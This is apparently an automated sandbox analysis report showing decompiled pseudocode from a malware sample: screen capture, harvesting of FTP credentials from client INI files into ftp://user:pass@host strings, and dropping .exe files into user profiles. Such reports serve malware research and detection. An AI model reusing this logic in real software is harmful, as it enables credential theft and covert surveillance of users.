				char _v116;
				_Unknown_base(*)()* _v120;
				char _v148;
				signed int _v152;
				struct _ICONINFO _v172;
				char _v188;
				struct HINSTANCE__* _t169;
				_Unknown_base(*)()* _t176;
				struct HINSTANCE__* _t181;
				_Unknown_base(*)()* _t182;
				struct HINSTANCE__* _t183;
				_Unknown_base(*)()* _t191;
				struct HDC__* _t197;
				struct HICON__* _t199;
				signed int _t200;
				intOrPtr _t202;
				intOrPtr _t204;
				void* _t206;
				void* _t223;
				intOrPtr* _t224;
				int _t239;
				void* _t246;
				int _t251;
				unsigned int _t256;
				intOrPtr* _t258;
				signed short _t259;
				intOrPtr _t260;
				WCHAR** _t261;
				intOrPtr _t264;
				signed int _t265;
				signed int _t268;
				void* _t271;

				_v32 = 0;
				_v60 = 0;
				_v16 = 0;
				_v104 = 1;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_t169 = LoadLibraryA("gdiplus.dll");
				_v20 = _t169;
				_v24 = GetProcAddress(_t169, "GdiplusStartup");
				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
				_v108 = _t176;
				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
					L74:
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
					if(_v60 != 0) {
						FreeLibrary(_v60);
					}
					if(_v16 != 0) {
						FreeLibrary(_v16);
					}
					return _v32;
				} else {
					_t181 = LoadLibraryA("ole32.dll");
					_v60 = _t181;
					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
					_v120 = _t182;
					if(_t182 == 0) {
						goto L74;
					}
					_t183 = LoadLibraryA("gdi32.dll");
					_v16 = _t183;
					_t258 = GetProcAddress(_t183, "CreateDCW");
					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
					_v56 = GetProcAddress(_v16, "SelectObject");
					_v76 = GetProcAddress(_v16, "BitBlt");
					_v84 = GetProcAddress(_v16, "DeleteObject");
					_t191 = GetProcAddress(_v16, "DeleteDC");
					_v68 = _t191;
					if(_t258 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
						goto L74;
					} else {
						_push(0);
						_push( &_v104);
						_push( &_v116);
						_v104 = 1;
						_v100 = 0;
						_v96 = 0;
						_v92 = 0;
						if(_v24() != 0) {
							goto L74;
						}
						_t264 =  *_t258(L"DISPLAY", 0, 0, 0);
						_v24 = _t264;
						if(_t264 == 0) {
							L73:
							_v80(_v116);
							goto L74;
						}
						_t197 = _v12(_t264);
						_v36 = _t197;
						if(_t197 == 0) {
							L72:
							_v68(_v24);
							goto L73;
						}
						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
						_v12 = _t199;
						if(_t199 == 0) {
							L24:
							_t259 = 0;
							goto L26;
						} else {
							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
								_v12 = 0;
							}
							if(_v12 != 0) {
								_t259 = _a12;
								L26:
								if(_t259 == 0) {
									_t200 = _v28(_t264, 8);
									_t265 = _t200;
									_a12 = _v28(_v24, 0xa);
								} else {
									_t265 = _t259 & 0x0000ffff;
									_a12 = _t265;
								}
								_t202 = _v44(_v24, _t265, _a12);
								_v44 = _t202;
								if(_t202 == 0) {
									L71:
									_v68(_v36);
									goto L72;
								} else {
									_t204 = _v56(_v36, _t202);
									_v112 = _t204;
									if(_t204 == 0) {
										L70:
										_v84(_v44);
										goto L71;
									}
									_t206 = 0;
									_t246 = 0;
									if(_t259 != 0) {
										_t256 = (_t259 & 0x0000ffff) >> 1;
										_t206 = _v52.x - _t256;
										if(_t206 < 0) {
											_t206 = 0;
										}
										_t246 = _v52.y - _t256;
										if(_t246 < 0) {
											_t246 = 0;
										}
										_t81 =  &_v52;
										 *_t81 = _v52.x - _t206;
										if( *_t81 < 0) {
											_v52.x = 0;
										}
										_t84 =  &(_v52.y);
										 *_t84 = _v52.y - _t246;
										if( *_t84 < 0) {
											_v52.y = 0;
										}
									}
									_push(0x40cc0020);
									_push(_t246);
									_push(_t206);
									_push(_v24);
									_push(_a12);
									_push(_t265);
									_push(0);
									_push(0);
									_push(_v36);
									if(_v76() == 0) {
										L69:
										_v56(_v36, _v112);
										goto L70;
									} else {
										if(_v12 != 0) {
											_t251 = _v52.x - _v172.xHotspot;
											if(_t251 < 0) {
												_t251 = 0;
											}
											_t239 = _v52.y - _v172.yHotspot;
											if(_t239 < 0) {
												_t239 = 0;
											}
											DrawIcon(_v36, _t251, _t239, _v12);
										}
										_push( &_v12);
										_push(0);
										_push(_v44);
										_v12 = 0;
										if(_v88() != 0 || _v12 == 0) {
											goto L69;
										} else {
											_push( &_v28);
											_push( &_a12);
											_a12 = 0;
											_v28 = 0;
											if(_v40() != 0) {
												L68:
												_v72(_v12);
												goto L69;
											}
											_t215 = _v28;
											if(_v28 == 0 || _a12 == 0) {
												goto L68;
											} else {
												_t260 = E004097CC(_t215);
												_v40 = _t260;
												if(_t260 == 0) {
													goto L68;
												}
												_push(_t260);
												_push(_v28);
												_push(_a12);
												if(_v64() != 0) {
													L60:
													E004097F7(_v40);
													if(_a12 == 0) {
														_push( &_v32);
														_push(1);
														_push(0);
														if(_v120() == 0 && _v32 != 0) {
															_v152 = 0;
															if(_a8 > 0) {
																E00409833( &_v148, 0x402990, 0x10);
																 *((intOrPtr*)(_t271 + _v152 * 0x1c - 0x7c)) = 4;
																 *((intOrPtr*)(_t271 + _v152 * 0x1c - 0x80)) = 1;
																 *((intOrPtr*)(_t271 + _v152 * 0x1c - 0x78)) =  &_a8;
																_v152 = _v152 + 1;
															}
															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
															_t224 = _v32;
															if(_t223 == 0) {
																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
															} else {
																 *((intOrPtr*)( *_t224 + 8))(_t224);
																_v32 = 0;
															}
														}
													}
													goto L68;
												}
												_t268 = 0;
												if(_a12 <= 0) {
													goto L60;
												}
												_t261 = _t260 + 0x30;
												while(lstrcmpiW(_a4,  *_t261) != 0) {
													_t268 = _t268 + 1;
													_t261 =  &(_t261[0x13]);
													if(_t268 < _a12) {
														continue;
													}
													goto L60;
												}
												E00409833( &_v188, _t268 * 0x4c + _v40, 0x10);
												_a12 = 0;
												goto L60;
											}
										}
									}
								}
							}
							goto L24;
						}
					}
				}
			}

0x00411421
0x00411424
0x00411427
0x0041142a
0x00411431
0x00411434
0x00411437
0x0041143a
0x00411448
0x00411455
0x00411462
0x0041146f
0x0041147c
0x00411489
0x00411496
0x00411499
0x0041149b
0x004114a1
0x00411889
0x00411892
0x00411897
0x00411897
0x0041189c
0x004118a1
0x004118a1
0x004118a6
0x004118ab
0x004118ab
0x004118b4
0x004114dc
0x004114e1
0x004114e9
0x004114ec
0x004114ee
0x004114f3
0x00000000
0x00000000
0x004114fe
0x00411506
0x00411513
0x0041151f
0x0041152c
0x00411539
0x00411546
0x00411553
0x00411560
0x00411563
0x00411565
0x0041156a
0x00000000
0x004115ae
0x004115ae
0x004115b2
0x004115b6
0x004115b7
0x004115be
0x004115c1
0x004115c4
0x004115cc
0x00000000
0x00000000
0x004115dc
0x004115de
0x004115e3
0x00411883
0x00411886
0x00000000
0x00411886
0x004115ea
0x004115ed
0x004115f2
0x0041187d
0x00411880
0x00000000
0x00411880
0x00411607
0x0041160d
0x00411612
0x0041163c
0x0041163c
0x00000000
0x00411614
0x00411624
0x00411634
0x00411634
0x0041163a
0x00411640
0x00411643
0x00411646
0x00411653
0x0041165b
0x00411660
0x00411648
0x00411648
0x0041164b
0x0041164b
0x0041166a
0x0041166d
0x00411672
0x00411877
0x0041187a
0x00000000
0x00411678
0x0041167c
0x0041167f
0x00411684
0x00411871
0x00411874
0x00000000
0x00411874
0x0041168a
0x0041168c
0x00411691
0x00411699
0x0041169b
0x0041169d
0x0041169f
0x0041169f
0x004116a4
0x004116a6
0x004116a8
0x004116a8
0x004116aa
0x004116aa
0x004116ad
0x004116af
0x004116af
0x004116b2
0x004116b2
0x004116b5
0x004116b7
0x004116b7
0x004116b5
0x004116ba
0x004116bf
0x004116c0
0x004116c1
0x004116c4
0x004116c7
0x004116c8
0x004116c9
0x004116ca
0x004116d2
0x00411868
0x0041186e
0x00000000
0x004116d8
0x004116db
0x004116e0
0x004116e6
0x004116e8
0x004116e8
0x004116ed
0x004116f3
0x004116f5
0x004116f5
0x004116ff
0x004116ff
0x00411708
0x00411709
0x0041170a
0x0041170d
0x00411715
0x00000000
0x00411724
0x00411727
0x0041172b
0x0041172c
0x0041172f
0x00411737
0x00411862
0x00411865
0x00000000
0x00411865
0x0041173d
0x00411742
0x00000000
0x00411751
0x00411756
0x00411758
0x0041175d
0x00000000
0x00000000
0x00411763
0x00411764
0x00411767
0x0041176f
0x004117ad
0x004117b0
0x004117b8
0x004117c1
0x004117c5
0x004117c6
0x004117cc
0x004117db
0x004117e4
0x004117f4
0x00411802
0x00411813
0x00411823
0x00411827
0x00411827
0x00411841
0x00411846
0x00411849
0x0041185f
0x0041184b
0x0041184e
0x00411851
0x00411851
0x00411849
0x004117cc
0x00000000
0x004117b8
0x00411771
0x00411776
0x00000000
0x00000000
0x00411778
0x0041177b
0x0041178a
0x0041178b
0x00411791
0x00000000
0x00000000
0x00000000
0x00411793
0x004117a5
0x004117aa
0x00000000
0x004117aa
0x00411742
0x00411715
0x004116d2
0x00411672
0x00000000
0x0041163a
0x00411612
0x0041156a

APIs

LoadLibraryA.KERNEL32(gdiplus.dll,00000000,?,00000000), ref: 0041143A
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041144B
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00411458
GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 00411465
GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 00411472
GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041147F
GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041148C
GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 00411499
LoadLibraryA.KERNEL32(ole32.dll), ref: 004114E1
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 004114EC
LoadLibraryA.KERNEL32(gdi32.dll), ref: 004114FE
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 00411509
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 00411515
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 00411522
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041152F
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041153C
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 00411549
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 00411556
GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 00411563
LoadImageW.USER32 ref: 00411607
GetIconInfo.USER32(00000000,?), ref: 0041161C
GetCursorPos.USER32(?), ref: 0041162A
DrawIcon.USER32 ref: 004116FF
lstrcmpiW.KERNEL32(?,-00000030), ref: 00411780
FreeLibrary.KERNEL32(00000000), ref: 00411897
FreeLibrary.KERNEL32(?), ref: 004118A1
FreeLibrary.KERNEL32(00000000), ref: 004118AB

Strings

ole32.dll, xrefs: 004114DC
SelectObject, xrefs: 00411531
DISPLAY, xrefs: 004115D5
GdiplusShutdown, xrefs: 0041144D
CreateCompatibleDC, xrefs: 0041150B
gdi32.dll, xrefs: 004114F9
gdiplus.dll, xrefs: 0041141C
CreateStreamOnHGlobal, xrefs: 004114E3
GdipCreateBitmapFromHBITMAP, xrefs: 0041145A
CreateCompatibleBitmap, xrefs: 00411517
GdipGetImageEncoders, xrefs: 00411481
CreateDCW, xrefs: 00411500
DeleteObject, xrefs: 0041154B
GdipSaveImageToStream, xrefs: 0041148E
GdipDisposeImage, xrefs: 00411467
GdipGetImageEncodersSize, xrefs: 00411474
BitBlt, xrefs: 0041153E
DeleteDC, xrefs: 00411558
GdiplusStartup, xrefs: 00411442
GetDeviceCaps, xrefs: 00411524

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
API String ID: 1554524784-1167942225
Opcode ID: f6d3b8b0de9bacf613a8fab8841c7e8015a74c2b07552cefa7120845549c1a7c
Instruction ID: d672870f6b023e75ecf8434e3e900a2fa9532427c940171f4d6bc6410fb55e56
Opcode Fuzzy Hash: f6d3b8b0de9bacf613a8fab8841c7e8015a74c2b07552cefa7120845549c1a7c
Instruction Fuzzy Hash: 6EE1C371E00219AFCF20AFE1CD88AEEBBB9BF04341F14456BE615B6260D7795981CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00405841, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 121
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00405841(void* __edx, WCHAR* _a4) {
				intOrPtr _v0;
				WCHAR* _v4;
				intOrPtr _v8;
				WCHAR* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				void* __edi;
				WCHAR* _t20;
				long _t21;
				void* _t25;
				WCHAR* _t30;
				void* _t38;
				WCHAR* _t40;
				WCHAR* _t47;
				WCHAR* _t48;
				intOrPtr _t50;
				WCHAR** _t54;

				_t44 = __edx;
				_t54 =  &_v12;
				_t20 = HeapAlloc( *0x41a570, 8, 0x20002);
				_t40 = _t20;
				_v4 = _t40;
				if(_t40 == 0) {
					return _t20;
				}
				_t21 = GetPrivateProfileStringW(0, 0, 0, _t40, 0xffff, _a4);
				if(_t21 <= 0) {
					L16:
					return E004097F7(_t40);
				}
				_t3 = _t21 + 1; // 0x1
				if(E0040A6AE(_t40, _t3) == 0) {
					goto L16;
				}
				_t25 = HeapAlloc( *0x41a570, 8, 0xc0c);
				_v12 = _t25;
				if(_t25 != 0) {
					_v8 = _t25 + 0x5fa;
					do {
						if(StrStrIW(_t40, L"connections") == 0) {
							_t30 = StrStrIW(_t40, L"default");
							if(_t30 == 0) {
								_t47 = _v20;
								if(GetPrivateProfileStringW(_t40, L"host", _t30, _t47, 0xff, _v4) > 0) {
									_t48 =  &(_t47[0xff]);
									if(GetPrivateProfileStringW(_t40, L"username", 0, _t48, 0xff, _v4) > 0 && GetPrivateProfileStringW(_t40, L"password", 0,  &(_t48[0xff]), 0xff, _v4) > 0 && E004056E2(_t44,  &(_t48[0xff])) > 0) {
										_push(_v20);
										_push( &(_t48[0xff]));
										_push(_t48);
										_t49 = _v16;
										_t44 = 0x307;
										_t38 = E0040A4B7( &(_t48[0xff]), 0x307, _v16, L"ftp://%s:%s@%s\n");
										_t54 =  &(_t54[4]);
										if(_t38 > 0) {
											_t50 = _v0;
											if(E00409B2A(_t38, _t50, _t49) != 0) {
												 *((intOrPtr*)(_t50 + 4)) =  *((intOrPtr*)(_t50 + 4)) + 1;
											}
										}
									}
								}
							}
						}
						_t40 = E0040A6EC(_t40, 1);
					} while (_t40 != 0);
					E004097F7(_v16);
					_t40 = _v12;
				}
			}

0x00405841
0x00405841
0x0040585b
0x0040585d
0x00405861
0x00405867
0x004059ac
0x004059ac
0x00405880
0x00405884
0x0040599f
0x00000000
0x004059a0
0x0040588a
0x00405896
0x00000000
0x00000000
0x004058a9
0x004058ab
0x004058b1
0x004058bc
0x004058c5
0x004058d5
0x004058e1
0x004058e5
0x004058ef
0x00405900
0x00405906
0x0040591a
0x00405946
0x00405950
0x00405951
0x00405952
0x0040595b
0x00405960
0x00405965
0x0040596a
0x0040596d
0x0040597a
0x0040597c
0x0040597c
0x0040597a
0x0040596a
0x0040591a
0x00405900
0x004058e5
0x00405988
0x0040598a
0x00405996
0x0040599b
0x0040599b

APIs

HeapAlloc.KERNEL32(00000008,00020002,?,?,?,?,?), ref: 0040585B
GetPrivateProfileStringW.KERNEL32 ref: 00405880
HeapAlloc.KERNEL32(00000008,00000C0C,?,?,?,?,?), ref: 004058A9
StrStrIW.SHLWAPI(00000000,connections,?,?,?,?,?), ref: 004058D1
StrStrIW.SHLWAPI(00000000,default,?,?,?,?,?), ref: 004058E1
GetPrivateProfileStringW.KERNEL32 ref: 004058FC
GetPrivateProfileStringW.KERNEL32 ref: 00405916
GetPrivateProfileStringW.KERNEL32 ref: 00405930

Strings

connections, xrefs: 004058CB
default, xrefs: 004058DB
host, xrefs: 004058F6
password, xrefs: 0040592A
username, xrefs: 00405910
ftp://%s:%s@%s, xrefs: 00405956

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: PrivateProfileString$AllocHeap
String ID: connections$default$ftp://%s:%s@%s$host$password$username
API String ID: 2479592106-3902919163
Opcode ID: 0847271544df2366b5fa3813b311b4c18add26a7cbafa6a1407352049f84b769
Instruction ID: 9760c6139b9182c33011b729d08e3a25ea7ccbfc4018bd697df168868f71fda9
Opcode Fuzzy Hash: 0847271544df2366b5fa3813b311b4c18add26a7cbafa6a1407352049f84b769
Instruction Fuzzy Hash: 9D31167264030AB7D200BF718C41F2BBB9DEF94758F00043BB545B22E2E67DE9158A69

Uniqueness

Uniqueness Score: -1.00%

Function 00408C33, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 180
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00408C33() {
				char _v5;
				char* _v12;
				char _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v552;
				short _v1072;
				char _v1592;
				_Unknown_base(*)()* _t55;
				int _t61;
				char _t62;
				char _t68;
				int _t72;
				char _t73;
				char _t74;
				char _t78;
				char _t80;
				char _t85;
				WCHAR* _t90;
				int _t91;
				CHAR* _t103;
				struct HINSTANCE__* _t105;
				signed int _t106;
				void* _t107;

				_v5 = 0;
				_t105 = LoadLibraryA("userenv.dll");
				if(_t105 == 0) {
					L7:
					return 0;
				} else {
					_t55 = GetProcAddress(_t105, "GetDefaultUserProfileDirectoryW");
					if(_t55 != 0) {
						_push( &_v12);
						_t98 =  &_v552;
						_push( &_v552);
						_v12 = 0x104;
						if( *_t55() == 1) {
							_t90 =  &_v1072;
							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t90);
							if(_t90 == 0) {
								_t98 =  &_v552;
								_t91 = E0040A3AA(_t98);
								_v12 = _t91;
								if(StrCmpNIW(_t98,  &_v1072, _t91) == 0) {
									_t98 = _t107 + _v12 * 2 - 0x42c;
									E00409AD3(_t94 | 0xffffffff, _t107 + _v12 * 2 - 0x42c,  &_v1072);
									_v5 = 1;
								}
							}
						}
					}
					FreeLibrary(_t105);
					if(_v5 != 0) {
						_v5 = 0;
						_v24 = 0;
						_t103 = L".exe";
						do {
							_v12 = 0;
							_t61 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v24);
							_v28 = _t61;
							__eflags = _t61;
							if(_t61 == 0) {
								L11:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L24;
								}
								_t106 = 0;
								__eflags = _v20;
								if(_v20 <= 0) {
									L23:
									NetApiBufferFree(_v12);
									goto L24;
								} else {
									goto L13;
								}
								do {
									L13:
									_t72 = NetUserGetInfo(0,  *(_v12 + _t106 * 4), 0x17,  &_v16);
									__eflags = _t72;
									if(_t72 == 0) {
										_t73 = _v16;
										__eflags = _t73;
										if(_t73 != 0) {
											_t98 =  &_v552;
											_t74 = E0040F88A( *((intOrPtr*)(_t73 + 0x10)),  &_v552);
											__eflags = _t74;
											if(_t74 != 0) {
												_t78 = E0040B635( &_v1072,  &_v552,  &_v552);
												__eflags = _t78;
												if(_t78 != 0) {
													_t80 = E0040B3BA( &_v552);
													__eflags = _t80;
													if(_t80 != 0) {
														__eflags = E0040E80B(0,  &_v552,  &_v1592, _t103, 6);
														if(__eflags != 0) {
															_t85 = E004083EA( &_v552, __eflags, 0,  &_v1592, 0);
															__eflags = _t85;
															if(_t85 != 0) {
																_v5 = 1;
																E0040851A( &_v552,  *((intOrPtr*)(_v16 + 0x10)),  &_v1592);
															}
														}
													}
												}
											}
											NetApiBufferFree(_v16);
										}
									}
									_t106 = _t106 + 1;
									__eflags = _t106 - _v20;
								} while (_t106 < _v20);
								goto L23;
							}
							__eflags = _t61 - 0xea;
							if(_t61 != 0xea) {
								break;
							}
							goto L11;
							L24:
							__eflags = _v28 - 0xea;
						} while (_v28 == 0xea);
						_t62 =  &_v1072;
						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t62);
						__eflags = _t62;
						if(_t62 == 0) {
							__eflags = E0040E80B(0,  &_v1072,  &_v1592, _t103, 6);
							if(__eflags != 0) {
								_t68 = E004083EA(_t98, __eflags, 0,  &_v1592, 0);
								__eflags = _t68;
								if(_t68 != 0) {
									_v5 = 1;
								}
							}
						}
						return _v5;
					}
					goto L7;
				}
			}

0x00408c45
0x00408c4e
0x00408c52
0x00408ce4
0x00000000
0x00408c58
0x00408c5e
0x00408c66
0x00408c6b
0x00408c6c
0x00408c72
0x00408c73
0x00408c7f
0x00408c81
0x00408c8f
0x00408c97
0x00408c99
0x00408c9f
0x00408ca5
0x00408cba
0x00408cbf
0x00408ccf
0x00408cd4
0x00408cd4
0x00408cba
0x00408c97
0x00408c7f
0x00408cd9
0x00408ce2
0x00408cec
0x00408cef
0x00408cf2
0x00408cf7
0x00408d0d
0x00408d10
0x00408d15
0x00408d18
0x00408d1a
0x00408d27
0x00408d27
0x00408d2a
0x00000000
0x00000000
0x00408d30
0x00408d32
0x00408d35
0x00408def
0x00408df2
0x00000000
0x00000000
0x00000000
0x00000000
0x00408d3b
0x00408d3b
0x00408d48
0x00408d4d
0x00408d4f
0x00408d55
0x00408d58
0x00408d5a
0x00408d60
0x00408d6a
0x00408d6f
0x00408d71
0x00408d81
0x00408d86
0x00408d88
0x00408d91
0x00408d96
0x00408d98
0x00408db1
0x00408db3
0x00408dbe
0x00408dc3
0x00408dc5
0x00408dd4
0x00408dd8
0x00408dd8
0x00408dc5
0x00408db3
0x00408d98
0x00408d88
0x00408de0
0x00408de0
0x00408d5a
0x00408de5
0x00408de6
0x00408de6
0x00000000
0x00408d3b
0x00408d1c
0x00408d21
0x00000000
0x00000000
0x00000000
0x00408df7
0x00408df7
0x00408df7
0x00408e04
0x00408e15
0x00408e1b
0x00408e1d
0x00408e36
0x00408e38
0x00408e43
0x00408e48
0x00408e4a
0x00408e4c
0x00408e4c
0x00408e4a
0x00408e38
0x00000000
0x00408e53
0x00000000
0x00408ce2

APIs

LoadLibraryA.KERNEL32(userenv.dll,74B5F9B0,00000000), ref: 00408C48
GetProcAddress.KERNEL32(00000000,GetDefaultUserProfileDirectoryW), ref: 00408C5E
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00408C8F
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00408CB2
FreeLibrary.KERNEL32(00000000), ref: 00408CD9
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,00408169,?,?,74B05B60), ref: 00408D10
NetUserGetInfo.NETAPI32(00000000,?,00000017,?,00000000,00000000,00000002,?,000000FF,00408169,?,?,74B05B60), ref: 00408D48
NetApiBufferFree.NETAPI32(?,?,?,00000000,?,00000017,?,00000000,00000000,00000002,?,000000FF,00408169,?,?,74B05B60), ref: 00408DE0
NetApiBufferFree.NETAPI32(?,00000000,00000000,00000002,?,000000FF,00408169,?,?,74B05B60), ref: 00408DF2
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?,00000000,00000000,00000002,?,000000FF,00408169,?,?,74B05B60), ref: 00408E15

Strings

GetDefaultUserProfileDirectoryW, xrefs: 00408C58
userenv.dll, xrefs: 00408C40
.exe, xrefs: 00408CF2, 00408D9C, 00408E21

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
String ID: .exe$GetDefaultUserProfileDirectoryW$userenv.dll
API String ID: 1753652487-2535535916
Opcode ID: 8522e15a5bbb1017e1948a9b92b798a491ac6f7ed5a61d5b02735f8fe3518bc0
Instruction ID: 9c532109959bf1d4a426521ac1fb9af1ba8af4f63eee475e6ae0cdb3da1a6dcb
Opcode Fuzzy Hash: 8522e15a5bbb1017e1948a9b92b798a491ac6f7ed5a61d5b02735f8fe3518bc0
Instruction Fuzzy Hash: D6516471904218AADF10EBA4CE84EEFB7BDAF14304F4005BAF541F21C1DB799A49CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040540A, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040540A(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				int _v528;
				short* _v532;
				WCHAR* _v536;
				WCHAR* _v540;
				WCHAR* _v544;
				intOrPtr _v548;
				void* __edi;
				WCHAR* _t43;
				long _t44;
				intOrPtr _t54;
				int _t57;
				void* _t67;
				WCHAR* _t87;
				WCHAR* _t88;
				intOrPtr _t90;
				signed int _t95;
				void* _t97;

				_t97 = (_t95 & 0xfffffff8) - 0x21c;
				if(E0040B635( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L20:
					return 1;
				}
				if(( *__edx & 0x00000010) == 0) {
					_t43 = HeapAlloc( *0x41a570, 8, 0x20002);
					_v540 = _t43;
					if(_t43 == 0) {
						goto L20;
					}
					_t44 = GetPrivateProfileStringW(0, 0, 0, _t43, 0xffff,  &_v524);
					if(_t44 <= 0) {
						L19:
						E004097F7(_v540);
						goto L20;
					}
					_t9 = _t44 + 1; // 0x1
					if(E0040A6AE(_v540, _t9) == 0) {
						goto L19;
					}
					_t87 = HeapAlloc( *0x41a570, 8, 0xc20);
					_v536 = _t87;
					if(_t87 == 0) {
						goto L19;
					} else {
						_t12 =  &(_t87[0x1fe]); // 0x3fc
						_v532 =  &(_t12[0xff]);
						_v544 = _v540;
						goto L9;
						L17:
						_t54 = E0040A6EC(_v544, 1);
						_v548 = _t54;
						if(_t54 != 0) {
							_t87 = _v536;
							L9:
							if(GetPrivateProfileStringW(_v544, L"IP", 0, _t87, 0xff,  &_v524) > 0) {
								_t57 = GetPrivateProfileIntW(_v544, L"port", 0x15,  &_v524);
								_v528 = _t57;
								if(_t57 - 1 <= 0xfffe) {
									_t88 =  &(_t87[0xff]);
									if(GetPrivateProfileStringW(_v544, L"user", 0, _t88, 0xff,  &_v524) > 0) {
										_t25 =  &(_t88[0xff]); // 0x0
										if(GetPrivateProfileStringW(_v544, L"pass", 0, _t25, 0xff,  &_v524) > 0) {
											_t28 =  &(_t88[0xff]); // 0x0
											if(E0040530C(_v544, _t28) > 0) {
												_push(_v528);
												_t30 =  &(_t88[0xff]); // 0x0
												_push(_v536);
												_push(_t30);
												_push(_t88);
												_t89 = _v532;
												_t67 = E0040A4B7(_t30, 0x311, _v532, L"ftp://%s:%s@%s:%u\n");
												_t97 = _t97 + 0x14;
												if(_t67 > 0) {
													_t90 = _a4;
													if(E00409B2A(_t67, _t90, _t89) != 0) {
														 *((intOrPtr*)(_t90 + 4)) =  *((intOrPtr*)(_t90 + 4)) + 1;
													}
												}
											}
										}
									}
								}
							}
							goto L17;
						} else {
							E004097F7(_v536);
							goto L19;
						}
					}
				} else {
					E004053D2(_a4);
					goto L20;
				}
			}

0x00405410
0x0040542b
0x004055d2
0x004055da
0x004055da
0x00405434
0x0040545a
0x0040545e
0x00405464
0x00000000
0x00000000
0x0040547e
0x00405482
0x004055c9
0x004055cd
0x00000000
0x004055cd
0x00405488
0x00405496
